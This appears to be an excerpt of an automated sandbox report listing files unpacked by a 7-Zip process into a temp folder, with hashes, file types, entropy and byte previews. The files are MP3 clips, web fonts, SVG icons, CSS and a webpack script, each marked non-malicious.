      SHA-256:443819ACC2A6ADD4EE34D82499DEA380111017EA76E5073A426B7FA4EE36A83F
      SHA-512:2B9ADDCC9338666703BC485FDE6AF4F1B337E262F66605AE338640404A01DD42D41280229908498D8FFC761562696F09ED98DA860FB6ABE1CAF39E8EF9C88EF7
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info.......K................ #%'*-/1479<>ADFHKNPRUXZ]_begiloqsvy{~......................................................Lavc58.11............$.R........Z.og.................. d.....A.b..... .........d...4....W...0..'!p.u.'2.....18........<E...e.c.....N....$..R\....s....9.R.]....4.M.J./.r..X........"d....E....... .............4....vF........e.@...T.7.*F9.....;..B..JH k.....m.k..k>...!...h@.BP...../...~..^...!.6..@......."d.....F....... ....TU...B...4.............w.....Iw..U:.6......$.3.PQ40]f..<3B....jy%,...:.-2.[..j.YJM+k..l......(<m.l.... dB...II!..... ....x.....@..4......2P..+.j..&'..do..H.#....fW@.......:...v..Y..l..j[. .=...P..\`..)J.."......b.yD.*...7..ys...."d[......A..... .... .)..@ ..4......|....I@..! B.e..=E......n..6...........={..F~.g...m;NI.V$...cU^......W....5..mmv.N.#.."dq....F..0.... .......'.@...4....O.*..sD..+....~)..&.&.....gg..@q..$..$..)..t.?...$.L..R2
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):74702
      Entropy (8bit):7.61597634134734
      Encrypted:false
      SSDEEP:
      MD5:141F6DE6B90D0CD29761FA945DFC69F2
      SHA1:70C3EDB864B1908724A549E85F33623513112ED9
      SHA-256:45DCADB24771A0DA2A7FDC55FF1224DC2A511C27F0D99DF21D55EDA1F533FBE8
      SHA-512:C1DEB3BA654A7694AAF205A1BBF5D7B7CF6E7F9FE362CE0EB56041C7A8A23ED2BE208ABDC121AFF0BCA7805671B8F343578F6A4EF9D4F5B9659E52AD89705AA3
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info.......:..#............. "$'),/1469;>ACEHKMPSUWZ\_begilnqtvx{~......................................................Lavc58.11............$........#.HA.................... d.....@.c..... ......)!.@ ..4......8.. . ;......D...p...;....S..."p....J.X.........]%....Qj..k..2.Jv.r;.........-).0...c.bY.."d.....I.#..... ....,.-.. ..4....IVu6.Gs..U%`.........i.y.g.N..U~.4n(2C.......R........2.aPE....P.&.t..X"..J.)...W..D..Kbv..."d*............ .........$...4...............lb,7..Q.,..u7..L...L.G.#....{f.0w..(...B}Z?P..Re......G...]..U...UR.A..X..N.Un.c.. d<........0... ....@/.#$a...4...."O".....B.1.K.*@...... Q.......`...1q....h.d5'.S\..=...<;h@.E4hx.....D$L.....#.@.zx.........."dP.....)..8... ....D7 '.C...4......e..>.....@b]..4h.#...X@.....A./..ni....R%...<..=...v..n...6.r.o. ...t..B.\.MR....)......."de....H....... ......"D.....4........c.|lH.A...^C-t....u.x.P(}.*. ..... zr!.L.a.....e...&.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):23110
      Entropy (8bit):7.557793528727053
      Encrypted:false
      SSDEEP:
      MD5:964986AB017CE388025F9A8850C41258
      SHA1:429701FC9E67D3A29489F75569E39BC0058DE708
      SHA-256:0DF451143E199FAF4DD042F560298537B5DD940169A1B7999B0EB7664A1827E7
      SHA-512:C50F6D1D1BF1E4C9D4F1128853D9FCD385A0332782C1348A8FABB19050299A660DBD4200516697D20A9D3588191FADC6D41F24C7CE02206DC3C38C76E99F4BEF
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........Z............."#&),-0367:=@BDGJLORTVY\_`cfijmpstwz}~......................................................Lavc58.11............$........Z.&..................... d....@.c..... ....(.-..@ ..4.....B.+..B.HZ\....+S.tk...*.........e......{...*......8..E....O.4...G....2...CJ..S.....U)..."d............ .............4....v....N...@...I.N...w...........r......'\.M.&...hF...W.u5...i.....`...K$.v...>G..r.#q@. L..."d-............ .......F.B@..4.....G..*...z[.._..J. .p2.....)*..9e....W......0x<.>z........U.2Ehe}u...=.K.1K.=..=....H....... dA....H."..... ....p.-.. ..4.....,[.+'M.Q......uwz. >..$(..Yt....vq)..........1r...i...|$...E.;..P.W0fY..........DE.pj...C.."dV....F.)..... ....p....`...4....F... @T...Fep{....MD..2.......G.....bf.s....oz. ....t4`.(.....@3%.....(..}..W../.'..0~..M.."do....L.B..... ......)... ..4......"..f.N..7.:{..>.g..J@.?h......'e.F...v.../(J.|#.^.t..g
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):69739
      Entropy (8bit):7.610141402816408
      Encrypted:false
      SSDEEP:
      MD5:8D0EB6BDDC675202090D7C5A9B16D0A5
      SHA1:105FEE1E672412CFEE0C549CEA510638176CD050
      SHA-256:72F7870DD8A9400ACDF40294D4B1C463F41C0C22C5C09E928C34E3FFE9182C9D
      SHA-512:6CB73CB1750675935F9CE3B6270263B0ED0DDA7F319EE8CABCA596B1E27CCEDD92BF0D06256E479EAFD7193171B9BBF23CD7FF950767A7709F9AE0B902D96BC2
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info...........>............."%'*,.1469<>ACEHKMPSUXZ\_bdgjloqsvy{~......................................................Lavc58.11............$.&.......>...1.................. d.......C..... ....4........4.....+ke@.".+L......d>..a.e.0\..H.............!Ko...E...::..yRx.D.`...6......D)...H.I7H..n......"d......0.... ..........@..4.......}*:. 4m....]b.cK..................l......O7...0eq...u..q..[e....x....&....h2.#.atm...G...."d-...F..H.... .....-...B...4.....b&X.....p..D.....Qs...Z..k._@7G....fF+.m.H"..k(.(.`...*.h...?....O.Tg.d.......g..M.&..... dG.......... ....D.'$.@ ..4...........6V..@.&,.C.`.$.O.....{W@}].k..5%U@9..( ...*.h......e.2...T.,D..........*g.y(....9.s2.."d^....G...0... ......&.i @..4..........s.t..b+.NQN..`.....'.?....zA...|.;#.B'...c7p.HQ.#93......h Cs.6.w..,.N.D..&.S. .t-..."dp..!.K.;00... .....K<.eb`..4.....p#.!.Lm18eL.\....j..U..F].Y.Q#r.fN0Oc&..L..'st.U..\.Q..r=
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):41526
      Entropy (8bit):7.604509729727359
      Encrypted:false
      SSDEEP:
      MD5:0EFB83C12D2F7D7945B98368EF708F2B
      SHA1:C95C19968FA3858A02093C4B60F1BF005A52EE1B
      SHA-256:D3C0C3FCA1B3209CEAD04F96458FC4037F97CF94A6407EBD6A20A5689C22DE45
      SHA-512:93C1342E95696C090BD5E3F91BC147F621F29BBCB9ED09E714B7836A70EC5D008B37C3018FC7E07E634776DE0E9AC18EC8E3D565F83AF62CFBDF9B3DD97410F5
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info.......<.................#%'*,/2479<>ADFIKMPSUXZ]_begjlnrtvy{~......................................................Lavc58.11............$..........Q#.................... d............. ...... ..D ..4....4y............D.2..9B..........w.Q.a..p..+..w.*D ...A.T..I2...no]ms.!?.m~O*.=C.......K..|.Z.."d.....G.)0.... .....5...D...4......7.m...O.z..0..5..u.).DI....|.5.`.?...N.1.Z(8.0..[..]...#..~.n.`..@.{..V....l.9o.[....F...."d)....F..2 ... ....t3....@..4......A.c.(L...H,..{..H....Y...3.... tb..#..I......F.....4....].M......BD...........tr..y(h..k.. d=............ ......"D. ...4....f[.%.V'gjj..#% 2<..-."8...EXx...........($.44....,*.4*......Q....;:..N.P.P...@..GI.xZi~H......."dS....JI 0.... ....45&..D...4........0.&.l..LUg....:..C..#.......Q'%Q".$T...S.2.....Z..y%...a...xP...M.b~q.%....'@". (....<......"dh.....&..... ....H. $..@..4...._....Z.....6.F.z..L.<.K..W7#.Z...dz..@.....CT........?A
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):32514
      Entropy (8bit):7.590540758986759
      Encrypted:false
      SSDEEP:
      MD5:92ECD2F2778CC167F4CCF7FC0AF27978
      SHA1:425964381BC8373A09C71932D24398661D30879C
      SHA-256:292CF417A356BCF2A8FC26F7CF18422271178BDE2C71F1FBDF20F9C96B5F5717
      SHA-512:5151D898B093905328432D34A785FB8CE3670CD1082B351D4E8390D0D57D4AAD819EDA9881868A6450F9280405F1A74176B57ED880B70BDDBFCAFEE711615855
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........~............. #%(*,/257:<?ADFIKNPTVX[]`begjloqtwz|.......................................................Lavc58.11............$.q......~...5................... d.......F.0... ..........@..4.....$...i.........&..YM_.!)I0.......Z.&...M.K....A.}*...`.`..:r......U>)..U.4....q....v.L..B....x.."d......0.... .....)..$C...4.......:.......?...;.Z.m...(.b..1:9.......wvb..V)E..2..1C........0A....j..]].8....6*..0..4:....."d,......0.... ......... ...4....C]v..L.g.Zo..l]`.@.a..f.._..t.........M.....3D..)t...K*._(..&.k....R.@.H.4.a....}.`<..jN..k.. dH.......... .........`...4.....k..H>..jA.p.aX...B|......vW..{.........4..qK....8..Y....{.9....]...:....N.Zrc...b.@6QB.y.."dc...F....... ....D........4......N....</...m..h..j/....?..V=..0a...I:.....CK{s....;.e2x..Lj...nn.`....7D......y..U.h..q.."d.....I..I ... ....4.0.....4.....l.....:.s~k^......>u..x..H/...3Tx.4O....bq....hm.."xp.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.4.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):30686
      Entropy (8bit):7.571005671230653
      Encrypted:false
      SSDEEP:
      MD5:73FD298E79E08610ECD5D47248C38D16
      SHA1:F4594B7173A966D7928A75E450921D7AB0849155
      SHA-256:B17B8D0A3EC00E1CA4AA035EDF3CE1AED3BA1F3C375294FE7C795DC22B532DB0
      SHA-512:5CE2C146F14C25EDE7C2EE7750CB41AC70D0629CD223D1257C10F470ACEE8A79C54AD337AEE59FB99B3C4919F19E1C2240129A335C5532173BFF1F93FF4AE141
      Malicious:false
      Reputation:low
      Preview:ID3......#TSSE.......Lavf58.65.101.............P.................................Info..........w............. #%'+-/257:<>BDFIKNQSUY[]`behjlortwy{.......................................................Lavc58.11............$........w...Ao.................. d.....BHa..... ......' .@ ..4......HE...W.S.. .9.<o.|..W....6...I...7.........-..#@F%sJ..B.r%...q5......6?........4....o......"d.....D....... .............4......*.3.Y.........<X..<....U..G.@.W..<..g17.;.#Rm#......0......I0....6.K.+R.'C1."..!C.#..m...."d.....HI"..... ........1 ...4....D..NcE......G.E.p..t.i..*....(....c...R....x.K...../?CD....(...!.N..-.%F.U..);....09.7.:... dA.....l0.... ........$`@..4....@..cKi.....:..{..F..!K.1[l)9...@..(.J...$U&U....r....t.9P..a..-.QU.....7.C..z...k.!.X..."..."d[.....)i. ... .....&&.g...4......r[m.. ......M......g.GA...)..u.S..].Q.:=.g.wwe..x............X. .4...UW..y.S...x..`.1.{.+.."dj....K..Kp... ....d.8...@..4........(..k.:.........U..JO70....!.p&.t.......2*....C.X..50
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Audio file with ID3 version 2.3.0, contains: MPEG ADTS, layer III, v1, 64 kbps, 44.1 kHz, Stereo
      Category:dropped
      Size (bytes):27709
      Entropy (8bit):7.264558263502838
      Encrypted:false
      SSDEEP:
      MD5:691C1EDC79B032EA6D150FC291B7613D
      SHA1:56049F75783BBED2AAE6D03EB91B752BB16548C3
      SHA-256:8FCBF2CEDE0BA798AABC145593B273D3C76596CA9BCE0A3138684FA7B416359F
      SHA-512:DF1623C1542BBFE3CA2E6505D46538E6EC0EEBBDE8D712E03D32E8C22AA2A5E62B8369A3AE9263139F0E523826C15749C188B2005212CE6EB2E033054FDCAAA4
      Malicious:false
      Reputation:low
      Preview:ID3......vTIT2.......TPE1.......TALB.......TYER.......TCON.......TRCK.......COMM.......eng.online-audio-converter.com...................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):3142
      Entropy (8bit):4.781952102403096
      Encrypted:false
      SSDEEP:
      MD5:31009D2EFB710925BF7F308AF59C629B
      SHA1:5215C77B1719D0974DC529B523B758EF85DBEBD4
      SHA-256:18F86EF3FAD86C97D56274E5577B178A77F40587A80451A971013248E37190A6
      SHA-512:44129D626970C101DF41A0BC94FF6120A1034077628DA968D9C772FA6125D1F11478480CEC7086DFD1625C8FC07820202A711A5598EA131B7742B31211A3F394
      Malicious:false
      Reputation:low
      Preview:!function(modules) {. function __webpack_require__(moduleId) {. if (installedModules[moduleId]) return installedModules[moduleId].exports;. var module = installedModules[moduleId] = {. i: moduleId,. l: !1,. exports: {}. };. modules[moduleId].call(module.exports, module, module.exports, __webpack_require__);. module.l = !0;. return module.exports;. }. var installedModules = {};. __webpack_require__.m = modules;. __webpack_require__.c = installedModules;. __webpack_require__.i = function(value) {. return value;. };. __webpack_require__.d = function(exports, name, getter) {. if (!__webpack_require__.o(exports, name)) Object.defineProperty(exports, name, {. configurable: !1,. enumerable: !0,. get: getter. });. };. __webpack_require__.n = function(module) {. var getter = module && module.__esModule ? function() {. re
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:GIF image data, version 89a, 1 x 1
      Category:dropped
      Size (bytes):49
      Entropy (8bit):3.176789192964165
      Encrypted:false
      SSDEEP:
      MD5:56398E76BE6355AD5999B262208A17C9
      SHA1:A1FDEE122B95748D81CEE426D717C05B5174FE96
      SHA-256:2F561B02A49376E3679ACD5975E3790ABDFF09ECBADFA1E1858C7BA26E3FFCEF
      SHA-512:FD8B021F0236E487BFEE13BF8F0AE98760ABC492F7CA3023E292631979E135CB4CCB0C89B6234971B060AD72C0CA4474CBB5092C6C7A3255D81A54A36277B486
      Malicious:false
      Reputation:low
      Preview:GIF89a...................!.......,...........T..;
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:ASCII text
      Category:dropped
      Size (bytes):11187
      Entropy (8bit):5.04034274876304
      Encrypted:false
      SSDEEP:
      MD5:F7F8703ADA2176DC144343A2C2ACB1CD
      SHA1:091334A48056A8BAAFFF0CD672232DE1C1F6C838
      SHA-256:7D7853E95258A7A3F8EAF41795F7124E7D2DACDEB5F1EFE212B3FF7ED0DA9E50
      SHA-512:27D46472C06103E0BDD9D40149804C16F469305752C3A6D8473C2F2AB22B2C8FA5D65D61DDA7C617A3F12D8526B56A10320B8683F31D210AC2185FD0DAED8E97
      Malicious:false
      Reputation:low
      Preview:/* Switch */./*.Rules wrapped in @media selector to apply in new IE.Custom switches doesn't shows in Chrome.*/.@media screen and (min-width:0\0) and (min-resolution: +72dpi) {..custom-control_switch-input {. position: absolute;. top: 0;. left: 0;. margin-left: -9999px;. visibility: hidden;.}.input.custom-control_switch-input + label {. display: inline-block;. vertical-align: top;. position: absolute;. right: 0;. cursor: pointer;. outline: none;. user-select: none;. padding: 2px;. width: 36px;. height: 14px;. background-color: #b3b3b3;. border-radius: 12px;. transition: background 0.4s;.}.input.custom-control_switch-input + label:before,.input.custom-control_switch-input + label:after /* Circle */ {. content: '';. display: inline-block;. vertical-align: top;. position: absolute;.}.input.custom-control_switch-input + label:before {. top: 2px;. left: 2px;. bottom: 2px;. right: 2px;. background-color: #fff;. border-radius: 12px;. transition: background 0.4s;.}.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Embedded OpenType (EOT), icomoon family
      Category:dropped
      Size (bytes):1224
      Entropy (8bit):3.7919867328880548
      Encrypted:false
      SSDEEP:
      MD5:96D44740679FFAF2E5E1D2A8A75C48EE
      SHA1:D7B354E3524BEA85E065675D61E0D37C637C87E1
      SHA-256:C0C660EC085E958ACDB6DAB93F7DF3B8C2375DF26399BA9C62C79A14F4A23C58
      SHA-512:32F60040C4EF1D3E8A7C46F1D078EA0307BBF948761FC053EA14D7EDD2DFD41FE6CC2506BED8D0A2275105CF0370592DA12C0159824D4DE174F7D5E003655EE6
      Malicious:false
      Reputation:low
      Preview:....$.............................LP................................................i.c.o.m.o.o.n.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .1...0.....i.c.o.m.o.o.n................0OS/2..3........`cmap.AN........Tgasp.......p....glyf.......x...hhead...-.......6hhea...........$hmtx.......<....loca.(.H...P....maxp.......\... name.J.....|....post........... ...........................3...................................@..'......@...@............... .................................8............. '.......... '...............................................79..................79..................79......................'..}}....~......~.l..}................_.<...........X......X.......................................................................................4.............................................................`...........6...........u.......................K...................................g...........=...........|........... ...........R.........4..icomoon.i.c.o.m.o.o.nVersi
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:SVG Scalable Vector Graphics image
      Category:dropped
      Size (bytes):617
      Entropy (8bit):5.498343993124017
      Encrypted:false
      SSDEEP:
      MD5:940B3297E8EB64F9FCE869980104D86C
      SHA1:792492796D713141306932F4450ABCBFCD215545
      SHA-256:A6E2003E977A3B8D1BAB342C7FBDEBB2DE22CA39CFC69B5301D8284CC7AF80A4
      SHA-512:F2F737CDAA03F568680F937DF7F36213E66AABBF72E7B7383AE49AD1B92D1D4278F6F60EA9C8AB09712FAE11408004DD61750AF4C30B1E48B606C23A0E25172B
      Malicious:false
      Reputation:low
      Preview:<?xml version="1.0" standalone="no"?>.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >.<svg xmlns="http://www.w3.org/2000/svg">.<metadata>Generated by IcoMoon</metadata>.<defs>.<font id="icomoon" horiz-adv-x="1024">.<font-face units-per-em="1024" ascent="960" descent="-64" />.<missing-glyph horiz-adv-x="1024" />.<glyph unicode="&#x20;" horiz-adv-x="512" d="" />.<glyph unicode="&#x2714;" glyph-name="check" horiz-adv-x="1303" d="M125.277 465.702l-125.277-125.277 404.426-404.426 898.723 898.723-126.638 125.277-772.085-768-279.149 273.702z" />.</font></defs></svg>
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:TrueType Font data, 11 tables, 1st "OS/2", 14 names, Macintosh, type 1 string, icomoon
      Category:dropped
      Size (bytes):1060
      Entropy (8bit):3.9351872994831463
      Encrypted:false
      SSDEEP:
      MD5:FD4D9BFDB6F357C67BD22FDF9F0FF067
      SHA1:68A8ACAE232501D92AC165D984859890B80C67A5
      SHA-256:85E0BF0D78BD5363E43C4E51632F4B1C864DCF8BC8A910E3D7B077B5BFA0539B
      SHA-512:700C5788E8AA0D6572070302F430B1B79ACBBCAF9CF32844BD352B1149474B31F9A4C01231D982398B8DF3BB40EE808688107F83823D5E10C5E45AB7AD6AFD68
      Malicious:false
      Reputation:low
      Preview:...........0OS/2..3........`cmap.AN........Tgasp.......p....glyf.......x...hhead...-.......6hhea...........$hmtx.......<....loca.(.H...P....maxp.......\... name.J.....|....post........... ...........................3...................................@..'......@...@............... .................................8............. '.......... '...............................................79..................79..................79......................'..}}....~......~.l..}................_.<...........X......X.......................................................................................4.............................................................`...........6...........u.......................K...................................g...........=...........|........... ...........R.........4..icomoon.i.c.o.m.o.o.nVersion 1.0.V.e.r.s.i.o.n. .1...0icomoon.i.c.o.m.o.o.nicomoon.i.c.o.m.o.o.nRegular.R.e.g.u.l.a.ricomoon.i.c.o.m.o.o.nFont generated by IcoMoon..F.o.n.t. .g.e.n.e.r.a.t.e
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Web Open Font Format, TrueType, length 1136, version 0.0
      Category:dropped
      Size (bytes):1136
      Entropy (8bit):3.851990794866922
      Encrypted:false
      SSDEEP:
      MD5:9474D9C4C2DEA7DD557D1F38F31DDEC7
      SHA1:F1B6219BA9872669BF43859FB5BA981BFBB33240
      SHA-256:55403B6443719753AFF7787D85613CCC45B320215349BE6E2CC6E48361626926
      SHA-512:C54454CD463852FBF51C41EEFD77C78E9377E445BD62152DBBCBEA64826C259B952830EA80730E0D2D55A02EA230DD76197222AAEA4F0131E971E8F4D4816F24
      Malicious:false
      Reputation:low
      Preview:wOFF.......p.......$........................OS/2.......`...`..3.cmap...h...T...T.AN.gasp................glyf.......h...h....head...,...6...6...-hhea...d...$...$....hmtx................loca.............(.Hmaxp....... ... ....name.............J..post...P... ... ...............................3...................................@..'......@...@............... .................................8............. '.......... '...............................................79..................79..................79......................'..}}....~......~.l..}................_.<...........X......X.......................................................................................4.............................................................`...........6...........u.......................K...................................g...........=...........|........... ...........R.........4..icomoon.i.c.o.m.o.o.nVersion 1.0.V.e.r.s.i.o.n. .1...0icomoon.i.c.o.m.o.o.nicomoon.i.c.o.m.o.o.nRegular.R.e.g.u.l.
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Embedded OpenType (EOT), icomoon family
      Category:dropped
      Size (bytes):7996
      Entropy (8bit):6.235970540696016
      Encrypted:false
      SSDEEP:
      MD5:D85A00CCB58D531AFD9AD80A067FBF0E
      SHA1:0A3C0CFEA5B9C0FDD5F17A1DF49CB1512316330D
      SHA-256:0A04D85875091CC334F63B90C8CCFA0838F20023945D949296363369066870E3
      SHA-512:BCE1796D0C71291CB779E2E99399A213B030663D5968330932B4A059BA48F3679E2DF9E9C84201EFB090A44B499BC5F46D174AD40B4B1D3AFB5DF5D2F3299261
      Malicious:false
      Reputation:low
      Preview:<.................................LP........................k.A(....................i.c.o.m.o.o.n.....R.e.g.u.l.a.r.....V.e.r.s.i.o.n. .1...0.....i.c.o.m.o.o.n................0OS/2...V.......`cmap.m..........gasp............glyf.d..........head...........6hhea...........$hmtxq7.........xlocaLLF^.......>maxp.,......... name.J..........post.......x... ...........................3...................................@...!.....@...@............... .................................h............. %.&0&.'.'....!......... %.&0&.'.'....!.............|........................................................79..................79..................79......................!.!7!.!....... ...*...e.. .%........./............!5%.!5!5.!5./...`...`.... . . ........../........!5./.... ................."......#"........3267.>.54&#*.#.j.(..%.r.#.-A.....$..(..#..@-........#.@..@..,........$.(.-@..................7...%..'........R....R.......R......R............................!.!"..%!.!.4&#...3!.!.!265.!..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:SVG Scalable Vector Graphics image
      Category:dropped
      Size (bytes):30023
      Entropy (8bit):4.195555037829616
      Encrypted:false
      SSDEEP:
      MD5:7013E3964CC64258A6BDCEDF499088DE
      SHA1:C7374A4592BE06B1788EAA24FC42A01E0F0F8829
      SHA-256:E69B080B44B611BC292E6F33C24CBF310935D3465903AF93FE0BB508071CE755
      SHA-512:71EB145D3A89372967E70D3BCB28869EDE355CBC1639AD1BE2DCECF1D37725AFCD6EF7B27E28BFDD5C07491AC9EFEFA2EC441EBBEA1150FA3F1A3FAF023D69C5
      Malicious:false
      Reputation:low
      Preview:<?xml version="1.0" standalone="no"?>.<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd" >.<svg xmlns="http://www.w3.org/2000/svg">.<metadata>Generated by IcoMoon</metadata>.<defs>.<font id="icomoon" horiz-adv-x="1024">.<font-face units-per-em="1024" ascent="960" descent="-64" />.<missing-glyph horiz-adv-x="1024" />.<glyph unicode="&#x20;" horiz-adv-x="512" d="" />.<glyph unicode="&#x25fb;" glyph-name="maximize" d="M755.84 649.92v-410.88h-490.24v410.88h490.24zM787.84 681.92h-554.24v-474.88h554.24v474.88z" />.<glyph unicode="&#x2630;" glyph-name="burger" d="M814.72 277.44v-32h-608v32h608zM814.72 469.44v-32h-608v32h608zM814.72 661.44v-32h-608v32h608z" />.<glyph unicode="&#x268a;" glyph-name="minimize" d="M814.72 277.44v-32h-608v32h608z" />.<glyph unicode="&#x2713;" glyph-name="pro_checked" horiz-adv-x="1498" d="M1385.533 960c-30.259-0.364-57.51-12.946-77.105-33.032l-731.352-733.419-398.031 320.904c-18.653 15.14-42.688 24.308-68.863 24.308-60
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:TrueType Font data, 11 tables, 1st "OS/2", 14 names, Macintosh, type 1 string, icomoon
      Category:dropped
      Size (bytes):7832
      Entropy (8bit):6.269266005200218
      Encrypted:false
      SSDEEP:
      MD5:E14D422A77B20390FE8ABAF4641D0D95
      SHA1:DBA787EC9D51B19AD4CAD58C07ED7C0775715976
      SHA-256:0F03FECF36A857C641AD780DEC1DFDB556ECDF4731DE16679889CA05F26ED33F
      SHA-512:D992ADF1B8B8FA722519C178FA717A6F84A0958D4146261C986D0BD0B441572661E49C185F775E91DE3616C73E83420ED92ED9056BBE54A392F590F72E00C754
      Malicious:false
      Reputation:low
      Preview:...........0OS/2...V.......`cmap.m..........gasp............glyf.d..........head...........6hhea...........$hmtxq7.........xlocaLLF^.......>maxp.,......... name.J..........post.......x... ...........................3...................................@...!.....@...@............... .................................h............. %.&0&.'.'....!......... %.&0&.'.'....!.............|........................................................79..................79..................79......................!.!7!.!....... ...*...e.. .%........./............!5%.!5!5.!5./...`...`.... . . ........../........!5./.... ................."......#"........3267.>.54&#*.#.j.(..%.r.#.-A.....$..(..#..@-........#.@..@..,........$.(.-@..................7...%..'........R....R.......R......R............................!.!"..%!.!.4&#...3!.!.!265.!...../C......C/.rC/.U.9.9.U/C.9.N....C/r.9.U/C.r/C...9C/.U.......u.......*.#"&'..#*.#..'...10>.5...#.....Aq))qA...?q.........,q?.`4,,4.*%....u88v....%+...............
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Web Open Font Format, TrueType, length 7908, version 0.0
      Category:dropped
      Size (bytes):7908
      Entropy (8bit):6.250082220919653
      Encrypted:false
      SSDEEP:
      MD5:720CD161ED3C3E4583D9C8537158965D
      SHA1:410A9E8B8C2410AA3A4BE91C62F26DA6B840CD49
      SHA-256:BDEE6C77D576B1D66EF8F34830FF4C52EF86F7B965D418AF53DB0F888EAD21C0
      SHA-512:E323873A2CAE83E84D8D8D6A246A510DA3216F268738B6A5407015BD98D131ADBB1BC5495A61FC54E08787FD7508CF0FB6B7FFE471375DA805A45A3B5D959A67
      Malicious:false
      Reputation:low
      Preview:wOFF........................................OS/2.......`...`...Vcmap...h.........m..gasp................glyf.............d..head.......6...6....hhea...@...$...$....hmtx...d...x...xq7..loca.......>...>LLF^maxp....... ... .,..name...<.........J..post....... ... ...............................3...................................@...!.....@...@............... .................................h............. %.&0&.'.'....!......... %.&0&.'.'....!.............|........................................................79..................79..................79......................!.!7!.!....... ...*...e.. .%........./............!5%.!5!5.!5./...`...`.... . . ........../........!5./.... ................."......#"........3267.>.54&#*.#.j.(..%.r.#.-A.....$..(..#..@-........#.@..@..,........$.(.-@..................7...%..'........R....R.......R......R............................!.!"..%!.!.4&#...3!.!.!265.!...../C......C/.rC/.U.9.9.U/C.9.N....C/r.9.U/C.r/C...9C/.U.......u.......*.#"&'..#*.#..'..
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:ASCII text, with very long lines (569)
      Category:dropped
      Size (bytes):720
      Entropy (8bit):4.629777753997206
      Encrypted:false
      SSDEEP:
      MD5:1064C6F4385932FF89BEFBD918912A0E
      SHA1:0DD2238D662F7A72017A9BE4087FE0475A95133E
      SHA-256:FB649287303416E9D2019B86FA1D1E8FF68F7D2BE0DC25C4BF79D0C7FC4937A4
      SHA-512:DA157D06168AAAFA5658844CAE8EE933AAAE8E2BBFAF079700094CAAD2658E983D48A72DF4CB7528280260E0E0D0E63EDA40D6FF8346FC378DED62D170A128C0
      Malicious:false
      Reputation:low
      Preview:# Font Squirrel Font-face Generator Configuration File.# Upload this file to the generator to recreate the settings.# you used to create these fonts...{"mode":"expert","formats":["ttf","eotz"],"tt_instructor":"default","fix_gasp":"xy","fix_vertical_metrics":"Y","metrics_ascent":"","metrics_descent":"","metrics_linegap":"","add_spaces":"Y","add_hyphens":"Y","fallback":"none","fallback_custom":"100","options_subset":"advanced","subset_range":["cyrillic","english","french","georgian","german","greek","italian","spanish"],"subset_custom":"","subset_custom_range":"","subset_ot_features_list":"","css_stylesheet":"stylesheet.css","filename_suffix":"-webfont","emsquare":"2048","spacing_adjustment":"0","rememberme":"Y"}
      Process:C:\Users\user\AppData\Local\Temp\beetle-cab\7za.exe
      File Type:Embedded OpenType (EOT), Open Sans family
      Category:dropped
      Size (bytes):41499
      Entropy (8bit):7.968646840867189
      Encrypted:false
      SSDEEP:
      MD5:DF57BEE75C4ECCA2E6BEC4793F2DCC99
      SHA1:AAC68C6F573368A5380DB763A8BEB62D189B336C
      SHA-256:DC84D56EC591269F07466D69FD0E2DE2A79C8F44BACEEA73E4B16C92016F0690
      SHA-512:A0627A1B4122F7699BD0794293F0788B280808A54415D5157BF2FEA6406AD8A0524336556D256202766942AE94C3FF5A3251F2BA490FA2655E95E51933673534
      Malicious:false
